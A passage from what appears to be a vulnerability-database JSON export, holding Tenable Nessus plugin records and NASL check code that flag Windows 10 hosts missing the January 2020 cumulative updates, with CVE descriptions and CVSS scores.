Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534276.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534276');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534276])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:25", "description": "The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in Windows 10 when third party filters are called during a password update. Successful exploitation of the vulnerability could allow a user to make use of a blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code- signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in- the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534293: Windows 10 Version 1803 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534293.NASL", "href": "https://www.tenable.com/plugins/nessus/132862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132862);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n\n script_name(english:\"KB4534293: Windows 10 Version 1803 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534293.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534293');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534293])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T22:48:45", "description": "The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in Windows 10 when third party filters are called during a password update. Successful exploitation of the vulnerability could allow a user to make use of a blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code- signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in- the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the way the Update Notification Manager handles files.\n (CVE-2020-0638)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534273.NASL", "href": "https://www.tenable.com/plugins/nessus/132859", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132859);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0612\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n 